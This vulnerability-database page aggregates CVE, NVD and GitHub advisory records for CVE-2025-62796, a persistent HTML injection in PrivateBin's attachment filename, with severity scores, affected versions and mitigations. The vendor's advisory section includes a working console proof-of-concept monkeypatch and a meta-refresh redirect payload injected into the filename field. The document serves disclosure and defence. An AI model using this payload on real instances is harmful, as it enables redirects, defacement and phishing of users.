cvelistv5 - cve-2025-62796

CVE-2025-62796 (GCVE-0-2025-62796)

Vulnerability from cvelistv5

Published

2025-10-28 20:47

Modified

2025-10-29 13:31

Severity ?

5.8 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N

CWE

CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE-80 - Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)

Summary

PrivateBin is an online pastebin where the server has zero knowledge of pasted data. Versions 1.7.7 through 2.0.1 allow persistent HTML injection via the unsanitized attachment filename (attachment_name) when attachments are enabled. An attacker can modify attachment_name before encryption so that, after decryption, arbitrary HTML is inserted unescaped into the page near the file size hint, enabling redirect (e.g., meta refresh) and site defacement and related phishing attacks. Script execution is normally blocked by the recommended Content Security Policy, limiting confidentiality impact. The issue was introduced in 1.7.7 and fixed in 2.0.2. Update to 2.0.2 or later. Workarounds include enforcing the recommended CSP, deploying PrivateBin on a separate domain, or disabling attachments.

References

URL

Tags

	security-advisories@github.com	https://github.com/PrivateBin/PrivateBin/commit/c4f8482b3072be7ae012cace1b3f5658dcc3b42e
	security-advisories@github.com	https://github.com/PrivateBin/PrivateBin/pull/1550
	security-advisories@github.com	https://github.com/PrivateBin/PrivateBin/security/advisories/GHSA-867c-p784-5q6g

Impacted products

	Vendor	Product	Version
	PrivateBin	PrivateBin	Version: >= 1.7.7, < 2.0.2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-62796",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-10-29T13:30:18.884080Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-10-29T13:31:54.964Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "PrivateBin",
          "vendor": "PrivateBin",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 1.7.7, \u003c 2.0.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "PrivateBin is an online pastebin where the server has zero knowledge of pasted data. Versions 1.7.7 through 2.0.1 allow persistent HTML injection via the unsanitized attachment filename (attachment_name) when attachments are enabled. An attacker can modify attachment_name before encryption so that, after decryption, arbitrary HTML is inserted unescaped into the page near the file size hint, enabling redirect (e.g., meta refresh) and site defacement and related phishing attacks. Script execution is normally blocked by the recommended Content Security Policy, limiting confidentiality impact. The issue was introduced in 1.7.7 and fixed in 2.0.2. Update to 2.0.2 or later. Workarounds include enforcing the recommended CSP, deploying PrivateBin on a separate domain, or disabling attachments."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 5.8,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-80",
              "description": "CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-10-28T20:47:50.277Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/PrivateBin/PrivateBin/security/advisories/GHSA-867c-p784-5q6g",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/PrivateBin/PrivateBin/security/advisories/GHSA-867c-p784-5q6g"
        },
        {
          "name": "https://github.com/PrivateBin/PrivateBin/pull/1550",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/PrivateBin/PrivateBin/pull/1550"
        },
        {
          "name": "https://github.com/PrivateBin/PrivateBin/commit/c4f8482b3072be7ae012cace1b3f5658dcc3b42e",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/PrivateBin/PrivateBin/commit/c4f8482b3072be7ae012cace1b3f5658dcc3b42e"
        }
      ],
      "source": {
        "advisory": "GHSA-867c-p784-5q6g",
        "discovery": "UNKNOWN"
      },
      "title": "PrivateBin persistent HTML injection in attachment filename enables redirect and defacement"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-62796",
    "datePublished": "2025-10-28T20:47:50.277Z",
    "dateReserved": "2025-10-22T18:55:48.011Z",
    "dateUpdated": "2025-10-29T13:31:54.964Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-62796\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-10-28T21:15:40.760\",\"lastModified\":\"2025-10-30T15:05:32.197\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"PrivateBin is an online pastebin where the server has zero knowledge of pasted data. Versions 1.7.7 through 2.0.1 allow persistent HTML injection via the unsanitized attachment filename (attachment_name) when attachments are enabled. An attacker can modify attachment_name before encryption so that, after decryption, arbitrary HTML is inserted unescaped into the page near the file size hint, enabling redirect (e.g., meta refresh) and site defacement and related phishing attacks. Script execution is normally blocked by the recommended Content Security Policy, limiting confidentiality impact. The issue was introduced in 1.7.7 and fixed in 2.0.2. Update to 2.0.2 or later. Workarounds include enforcing the recommended CSP, deploying PrivateBin on a separate domain, or disabling attachments.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N\",\"baseScore\":5.8,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":1.4}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"},{\"lang\":\"en\",\"value\":\"CWE-80\"}]}],\"references\":[{\"url\":\"https://github.com/PrivateBin/PrivateBin/commit/c4f8482b3072be7ae012cace1b3f5658dcc3b42e\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/PrivateBin/PrivateBin/pull/1550\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/PrivateBin/PrivateBin/security/advisories/GHSA-867c-p784-5q6g\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-62796\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-10-29T13:30:18.884080Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-10-29T13:30:40.820Z\"}}], \"cna\": {\"title\": \"PrivateBin persistent HTML injection in attachment filename enables redirect and defacement\", \"source\": {\"advisory\": \"GHSA-867c-p784-5q6g\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 5.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"PrivateBin\", \"product\": \"PrivateBin\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 1.7.7, \u003c 2.0.2\"}]}], \"references\": [{\"url\": \"https://github.com/PrivateBin/PrivateBin/security/advisories/GHSA-867c-p784-5q6g\", \"name\": \"https://github.com/PrivateBin/PrivateBin/security/advisories/GHSA-867c-p784-5q6g\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/PrivateBin/PrivateBin/pull/1550\", \"name\": \"https://github.com/PrivateBin/PrivateBin/pull/1550\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/PrivateBin/PrivateBin/commit/c4f8482b3072be7ae012cace1b3f5658dcc3b42e\", \"name\": \"https://github.com/PrivateBin/PrivateBin/commit/c4f8482b3072be7ae012cace1b3f5658dcc3b42e\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"PrivateBin is an online pastebin where the server has zero knowledge of pasted data. Versions 1.7.7 through 2.0.1 allow persistent HTML injection via the unsanitized attachment filename (attachment_name) when attachments are enabled. An attacker can modify attachment_name before encryption so that, after decryption, arbitrary HTML is inserted unescaped into the page near the file size hint, enabling redirect (e.g., meta refresh) and site defacement and related phishing attacks. Script execution is normally blocked by the recommended Content Security Policy, limiting confidentiality impact. The issue was introduced in 1.7.7 and fixed in 2.0.2. Update to 2.0.2 or later. Workarounds include enforcing the recommended CSP, deploying PrivateBin on a separate domain, or disabling attachments.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-79\", \"description\": \"CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-80\", \"description\": \"CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-10-28T20:47:50.277Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-62796\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-10-29T13:31:54.964Z\", \"dateReserved\": \"2025-10-22T18:55:48.011Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-10-28T20:47:50.277Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

fkie_cve-2025-62796

Vulnerability from fkie_nvd

Published

2025-10-28 21:15

Modified

2025-10-30 15:05

Severity ?

5.8 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/PrivateBin/PrivateBin/commit/c4f8482b3072be7ae012cace1b3f5658dcc3b42e
	security-advisories@github.com	https://github.com/PrivateBin/PrivateBin/pull/1550
	security-advisories@github.com	https://github.com/PrivateBin/PrivateBin/security/advisories/GHSA-867c-p784-5q6g

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "PrivateBin is an online pastebin where the server has zero knowledge of pasted data. Versions 1.7.7 through 2.0.1 allow persistent HTML injection via the unsanitized attachment filename (attachment_name) when attachments are enabled. An attacker can modify attachment_name before encryption so that, after decryption, arbitrary HTML is inserted unescaped into the page near the file size hint, enabling redirect (e.g., meta refresh) and site defacement and related phishing attacks. Script execution is normally blocked by the recommended Content Security Policy, limiting confidentiality impact. The issue was introduced in 1.7.7 and fixed in 2.0.2. Update to 2.0.2 or later. Workarounds include enforcing the recommended CSP, deploying PrivateBin on a separate domain, or disabling attachments."
    }
  ],
  "id": "CVE-2025-62796",
  "lastModified": "2025-10-30T15:05:32.197",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.8,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "LOW",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 1.4,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-10-28T21:15:40.760",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/PrivateBin/PrivateBin/commit/c4f8482b3072be7ae012cace1b3f5658dcc3b42e"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/PrivateBin/PrivateBin/pull/1550"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/PrivateBin/PrivateBin/security/advisories/GHSA-867c-p784-5q6g"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        },
        {
          "lang": "en",
          "value": "CWE-80"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

ghsa-867c-p784-5q6g

Vulnerability from github

Published

2025-10-28 20:14

Modified

2025-10-29 14:48

Severity ?

5.8 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N

Summary

PrivateBin is missing HTML sanitization of attached filename in file size hint

Details

We’ve identified an HTML injection/XSS vulnerability in PrivateBin service that allows the injection of arbitrary HTML markup via the attached filename. Below are the technical details, PoC, reproduction steps, impact, and mitigation recommendations.

Recommend action: As the vulnerability has been fixed in the latest version, users are strongly encouraged to upgrade PrivateBin to the latest version and check that a strong CSP header, just as the default suggested one, is delivered.

Summary of the vulnerability: The attachment_name field containing the attached file name is included in the object that the client encrypts and is eventually rendered in the DOM without proper escaping.

Impact

The vulnerability allows attackers to inject arbitrary HTML into the filename displayed near the file size hint, when attachments are enabled. This is by definition a XSS vulnerability (CWE-80), in this case even a persistent XSS. As any HTML can be injected, basically, this can e.g. be used to inject a script tag (as per CWE-79).

That said, also due to previous issues, we have strong mitigations for this in place. The content security policy (CSP) does, if configured as recommend by the PrivateBin project, prevent any inline script execution, so the confidentiality of the paste is not affected.

However, as the reporter demonstrated, even when script execution is blocked, an HTML injection can still be used for attacks such as: * redirection using a meta redirect tag to redirect to a potentially malicious/attacker-controlled website * defacement of the website * phishing, in combination with the redirection to a clone of a PrivateBin phishing page or similar * potential attacks on other services hosted on the same domain

This list is by no means meant to be exhaustive, other attacks should be considered possible, that is why we treat this issue as a serious issue, even if the CSP is supposed to block the most attacks.

[!IMPORTANT]
Depending on the deployment, if the server has a different than the recommend CSP configured or the client (browser) somehow lacks a protection, the vulnerability can have much more serious impacts and potentially also allow XSS, which could mean the confidentiality of the PrivateBin instance is affected.

Technical Description

The front-end uses PrivateBin (client-side encryption) to format and encrypt data before sending. During the paste creation process, the client assembles a cipherMessage object containing, among other fields: * paste -> paste text * attachment -> file content (data-URI) * attachment_name -> array with file names

Before encryption, the ServerInteraction.setCipherMessage(cipherMessage) function is called. By intercepting/altering the cipherMessage on the client immediately before encryption, it is possible to replace attachment_name with an attacker-controlled string; this string becomes part of the encrypted content, and when the paste is opened, the local client decrypts and inserts the name into the DOM unescaped, allowing the interpretation of inserted HTML markup.

Note that it was not necessary to reimplement encryption: the monkeypatch modifies the object before the client applies AES-GCM/PBKDF2/compression, thus avoiding ciphertext formatting issues.

Proof of concept

Paste this into the console on the PrivateBin page before clicking Create.

```js // Monkeypatch to modify attachment_name immediately before encryption (() => { const desiredName = '">.txt'; // <- adjust here

// get the namespace used by PrivateBin if (!window.$ || !$.PrivateBin || !$.PrivateBin.ServerInteraction) { return console.error('PrivateBin namespace not found (make sure you are on the PrivateBin page).'); }

const SI = $.PrivateBin.ServerInteraction; // save original function const origSetCipherMessage = SI.setCipherMessage?.bind(SI);

if (typeof origSetCipherMessage !== 'function') { return console.error('setCipherMessage not found or is not a function.'); }

SI.setCipherMessage = async function(cipherMessage) { try { // cipherMessage here is the plain object the client intends to encrypt if (cipherMessage && Array.isArray(cipherMessage.attachment_name)) { console.log('[patch] original attachment_name:', cipherMessage.attachment_name); cipherMessage.attachment_name = cipherMessage.attachment_name.map(() => desiredName); console.log('[patch] attachment_name overwritten to:', cipherMessage.attachment_name); } else if (cipherMessage && cipherMessage.attachment && Array.isArray(cipherMessage.attachment)) { // if there are attachments but no attachment_name (rare), add a coherent array cipherMessage.attachment_name = cipherMessage.attachment.map(() => desiredName); console.log('[patch] attachment_name added:', cipherMessage.attachment_name); } else { // nothing to change }

  // call the original implementation (which performs the encryption)
  return await origSetCipherMessage(cipherMessage);
} catch (err) {
  console.error('Error in setCipherMessage monkeypatch:', err);
  // in case of error, attempt to call the original anyway
  return await origSetCipherMessage(cipherMessage);
}

};

console.log('Monkeypatch applied to ServerInteraction.setCipherMessage() - ready to send. (Reload the page to undo).'); })(); ```

Reproduction Steps

Access PrivateBin (in the program scope). A requirement is that you have file upload enabled.
Attach any file via the UI (file content irrelevant).
Open the browser console (F12 → Console).
Paste the snippet above and adjust desiredName to the desired HTML payload (e.g.,"><meta http-equiv="refresh" content="0;url=https://example.com/">.txt).
Click Create. The client will encrypt and send the paste normally.
Intercept/inspect the POST request (optional).
Open the generated link.

What happens: When rendering the paste, the content of the injected attachment_name will be interpreted according to the context, demonstrating the impact.

Mitigation

We strongly recommend you to upgrade to our latest release. However, here are some workarounds that may help you to mitigate this vulnerability without upgrade:

Update the CSP in your configuration file to the latest recommended settings and check that it isn't getting reverted or overwritten by your web server, reverse proxy or CDN, i.e. using our offered check service. Note: You should check your CSP independently, even if you upgrade to a fixed version. See also the section "More information" about how we recently enhanced the CSP protection.
Deploying PrivateBin on a separate domain may limit the scope of the vulnerability to PrivateBin itself and thus, as described in the “Impact” section, effectively prevent any damage by the vulnerability to other resources you are hosting.
As explained in the impact assessment, disabling attachments also prevents this issue.

Patches

The issue has been patched in version 2.0.2. The change that displayed the attachment name without sanitation was introduced in version 1.7.7. The code-changes in PrivateBin mitigating this issue can be found in commit c4f8482b3072be7ae012cace1b3f5658dcc3b42e.

References

We highly encourage server administrators and others involved with the PrivateBin project to read-up on how Content-Security-Policies work, especially should you consider to manually adjust it: * https://content-security-policy.com/ * https://developer.mozilla.org/docs/Web/HTTP/CSP * https://developers.google.com/web/fundamentals/security/csp/

Also please note that if multiple headers are set (as e.g. done via our introduced meta tag) browsers should apply the most restrictive set of the policies, as per the CSP specification.

More information

This issue is similar to https://github.com/PrivateBin/PrivateBin/security/advisories/GHSA-cqcc-mm6x-vmvw, but was, based on our analysis, apparently introduced in https://github.com/PrivateBin/PrivateBin/pull/1550.

Note that we have, independently as of this issue and as per regular security maintenance, already applied many CSP improvements and strengthened this security mechanism of PrivateBin. This includes in detail: * As part of the last XSS vulnerability, we have now included the CSP in a meta HTML tag, too, so in case the headers are somehow mangled with by (reverse) proxies or similar, the PrivateBin instance should still be protected as long as this HTML meta tag is included in an unchanged way. * https://github.com/PrivateBin/PrivateBin/pull/1613 - We have removed a outdated configuration recommendation, as default-src does not need to allow self anymore, but it can keep the more strict none even when using the bootstrap SVG icons. (previously a problem in Firefox prevented this) * https://github.com/PrivateBin/PrivateBin/pull/1464 - We could remove the previously used unsafe-eval that was a potentially risky CSP source being allowed for scripts, and replaced it with wasm-unsafe-eval for the streaming of a WebAssembly component used for optional compression. This can be disabled in the configuration and then wasm-unsafe-eval can also be removed.

In case you have not noticed this and did not upgrade your CSP header yet, we strongly recommend to do it as soon as possible!

Credits

On Thursday October 23rd, 2025 we received a report via email at security@privatebin.org. The reporter asked to stay anonymous. We thank them a lot for the detailed reporting of this vulnerability, including the description of the proof of concept listed above!

In general, we'd like to thank everyone reporting issues and potential vulnerabilities to us.

If you think you have found a vulnerability or potential security risk, we'd kindly ask you to follow our security policy and report it to us. We then assess the report and will take the actions we deem necessary to address it.

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "privatebin/privatebin"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.7.7"
            },
            {
              "fixed": "2.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-62796"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-601",
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-28T20:14:09Z",
    "nvd_published_at": "2025-10-28T21:15:40Z",
    "severity": "MODERATE"
  },
  "details": "We\u2019ve identified an HTML injection/XSS vulnerability in PrivateBin service that allows the injection of arbitrary HTML markup via the attached filename. Below are the technical details, PoC, reproduction steps, impact, and mitigation recommendations.\n\n**Recommend action:** As the vulnerability has been fixed in the latest version, users are **strongly encouraged** to upgrade PrivateBin to the latest version _and_ [check](https://privatebin.info/directory/check) that a strong CSP header, just as the default suggested one, is delivered.\n\n**Summary of the vulnerability:** The `attachment_name` field containing the attached file name is included in the object that the client encrypts and is eventually rendered in the DOM without proper escaping.\n\n## Impact\nThe vulnerability allows attackers to inject arbitrary HTML into the filename displayed near the file size hint, when attachments are enabled. This is by definition [a XSS vulnerability (CWE-80)](https://cwe.mitre.org/data/definitions/80.html), in this case even a persistent XSS. As any HTML can be injected, basically, this can e.g. be used to inject [a script tag (as per CWE-79)](https://cwe.mitre.org/data/definitions/79.html).\n\nThat said, also due to [previous issues](#more-informaton), we have strong mitigations for this in place. The [content security policy (CSP)](https://content-security-policy.com/) does, if configured as recommend by the PrivateBin project, prevent any inline script execution, so the confidentiality of the paste is _not_ affected.\n\nHowever, as the reporter demonstrated, even when script execution is blocked, an HTML injection can still be used for attacks such as:\n* redirection using a meta redirect tag to redirect to a potentially malicious/attacker-controlled website\n* defacement of the website\n* phishing, in combination with the redirection to a clone of a PrivateBin phishing page or similar\n* potential attacks on other services hosted on the same domain\n\nThis list is by no means meant to be exhaustive, other attacks should be considered possible, that is why we treat this issue as a serious issue, even if the CSP is supposed to block the most attacks.\n\n\u003e [!IMPORTANT]  \n\u003e Depending on the deployment, if the server has a different than the recommend CSP configured or the client (browser) somehow lacks a protection, the vulnerability can have much more serious impacts and potentially also allow XSS, which could mean the confidentiality of the PrivateBin instance is affected. \n\n## Technical Description\n\nThe front-end uses PrivateBin (client-side encryption) to format and encrypt data before sending. During the paste creation process, the client assembles a `cipherMessage` object containing, among other fields:\n* `paste` -\u003e paste text\n* `attachment` -\u003e file content (data-URI)\n* `attachment_name` -\u003e array with file names\n\nBefore encryption, the `ServerInteraction.setCipherMessage(cipherMessage)` function is called. By intercepting/altering the `cipherMessage` on the client immediately before encryption, it is possible to replace `attachment_name` with an attacker-controlled string; this string becomes part of the encrypted content, and when the paste is opened, the local client decrypts and inserts the name into the DOM unescaped, allowing the interpretation of inserted HTML markup.\n\nNote that it was not necessary to reimplement encryption: the monkeypatch modifies the object before the client applies AES-GCM/PBKDF2/compression, thus avoiding ciphertext formatting issues.\n\n## Proof of concept\nPaste this into the console on the PrivateBin page before clicking Create.\n\n```js\n// Monkeypatch to modify attachment_name immediately before encryption\n(() =\u003e {\n  const desiredName = \u0027\"\u003e\u003cmeta http-equiv=\"refresh\" content=\"0;url=https://example.com/\"\u003e.txt\u0027; // \u003c- adjust here\n\n  // get the namespace used by PrivateBin\n  if (!window.$ || !$.PrivateBin || !$.PrivateBin.ServerInteraction) {\n    return console.error(\u0027PrivateBin namespace not found (make sure you are on the PrivateBin page).\u0027);\n  }\n\n  const SI = $.PrivateBin.ServerInteraction;\n  // save original function\n  const origSetCipherMessage = SI.setCipherMessage?.bind(SI);\n\n  if (typeof origSetCipherMessage !== \u0027function\u0027) {\n    return console.error(\u0027setCipherMessage not found or is not a function.\u0027);\n  }\n\n  SI.setCipherMessage = async function(cipherMessage) {\n    try {\n      // cipherMessage here is the plain object the client intends to encrypt\n      if (cipherMessage \u0026\u0026 Array.isArray(cipherMessage.attachment_name)) {\n        console.log(\u0027[patch] original attachment_name:\u0027, cipherMessage.attachment_name);\n        cipherMessage.attachment_name = cipherMessage.attachment_name.map(() =\u003e desiredName);\n        console.log(\u0027[patch] attachment_name overwritten to:\u0027, cipherMessage.attachment_name);\n      } else if (cipherMessage \u0026\u0026 cipherMessage.attachment \u0026\u0026 Array.isArray(cipherMessage.attachment)) {\n        // if there are attachments but no attachment_name (rare), add a coherent array\n        cipherMessage.attachment_name = cipherMessage.attachment.map(() =\u003e desiredName);\n        console.log(\u0027[patch] attachment_name added:\u0027, cipherMessage.attachment_name);\n      } else {\n        // nothing to change\n      }\n\n      // call the original implementation (which performs the encryption)\n      return await origSetCipherMessage(cipherMessage);\n    } catch (err) {\n      console.error(\u0027Error in setCipherMessage monkeypatch:\u0027, err);\n      // in case of error, attempt to call the original anyway\n      return await origSetCipherMessage(cipherMessage);\n    }\n  };\n\n  console.log(\u0027Monkeypatch applied to ServerInteraction.setCipherMessage() - ready to send. (Reload the page to undo).\u0027);\n})();\n```\n\n## Reproduction Steps\n\n1. Access PrivateBin (in the program scope). A requirement is that you have file upload enabled.\n2. Attach any file via the UI (file content irrelevant).\n3. Open the browser console (F12 \u2192 Console).\n4. Paste the snippet above and adjust `desiredName` to the desired HTML payload (e.g.,` \"\u003e\u003cmeta http-equiv=\"refresh\" content=\"0;url=https://example.com/\"\u003e.txt`).\n5. Click Create. The client will encrypt and send the paste normally.\n6. Intercept/inspect the POST request (optional).\n7. Open the generated link.\n\n**What happens:** When rendering the paste, the content of the injected attachment_name will be interpreted according to the context, demonstrating the impact.\n\n## Mitigation\n\nWe strongly recommend you to **upgrade to our latest release**. However, here are some workarounds that may help you to mitigate this vulnerability without upgrade:\n\n* Update the [CSP in your configuration file](https://github.com/PrivateBin/PrivateBin/wiki/Configuration#cspheader) to the latest recommended settings and check that it isn\u0027t getting reverted or overwritten by your web server, reverse proxy or CDN, i.e. using [our offered check service](https://privatebin.info/directory/check).\n   **Note:** You should check your CSP independently, even if you upgrade to a fixed version. See also the section [\"More information\"](#more-information) about how we recently enhanced the CSP protection. \n* Deploying PrivateBin on a separate domain may limit the scope of the vulnerability to PrivateBin itself and thus, as described in the \u201cImpact\u201d section, effectively prevent any damage by the vulnerability to other resources you are hosting.\n* As explained in the impact assessment, disabling attachments also prevents this issue.\n\n## Patches\n\nThe issue has been patched in version 2.0.2. The change that displayed the attachment name without sanitation was introduced in version 1.7.7. The code-changes in PrivateBin mitigating this issue can be found in commit c4f8482b3072be7ae012cace1b3f5658dcc3b42e.\n\n## References\nWe highly encourage server administrators and others involved with the PrivateBin project to read-up on how Content-Security-Policies work, especially should you consider to manually adjust it:\n* https://content-security-policy.com/\n* https://developer.mozilla.org/docs/Web/HTTP/CSP\n* https://developers.google.com/web/fundamentals/security/csp/\n\nAlso please note that if multiple headers are set (as e.g. done via our introduced meta tag) [browsers should apply the most restrictive set of the policies](https://stackoverflow.com/a/51153816/5008962), [as per the CSP specification](https://www.w3.org/TR/CSP2/#enforcing-multiple-policies).\n\n## More information\nThis issue is similar to https://github.com/PrivateBin/PrivateBin/security/advisories/GHSA-cqcc-mm6x-vmvw, but was, based on our analysis, apparently introduced in https://github.com/PrivateBin/PrivateBin/pull/1550.\n\nNote that we have, independently as of this issue and as per regular security maintenance, already applied many CSP improvements and strengthened this security mechanism of PrivateBin. This includes in detail:\n* As part of the [last XSS vulnerability](#more-information), we have now included the CSP in a meta HTML tag, too, so in case the headers are somehow mangled with by (reverse) proxies or similar, the PrivateBin instance should still be protected as long as this HTML meta tag is included in an unchanged way.\n* https://github.com/PrivateBin/PrivateBin/pull/1613 - We have removed a outdated configuration recommendation, as `default-src` does not need to allow `self` anymore, but it can keep the more strict `none` even when using the bootstrap SVG icons. ([previously a problem in Firefox prevented this](https://bugzilla.mozilla.org/show_bug.cgi?id=1773976))\n* https://github.com/PrivateBin/PrivateBin/pull/1464 - We could remove the previously used `unsafe-eval` that was a potentially risky CSP source being allowed for scripts, and replaced it with `wasm-unsafe-eval` for the streaming of a WebAssembly component used for optional compression. This can be disabled in the configuration and then `wasm-unsafe-eval` can also be removed.\n\nIn case you have not noticed this and did not upgrade your CSP header yet, **we strongly recommend to do it as soon as possible**!\n\n## Credits\n\nOn Thursday October 23rd, 2025 we received a report via email at security@privatebin.org. The reporter asked to stay anonymous. We thank them a lot for the detailed reporting of this vulnerability, including the description of the proof of concept listed above!\n\nIn general, we\u0027d 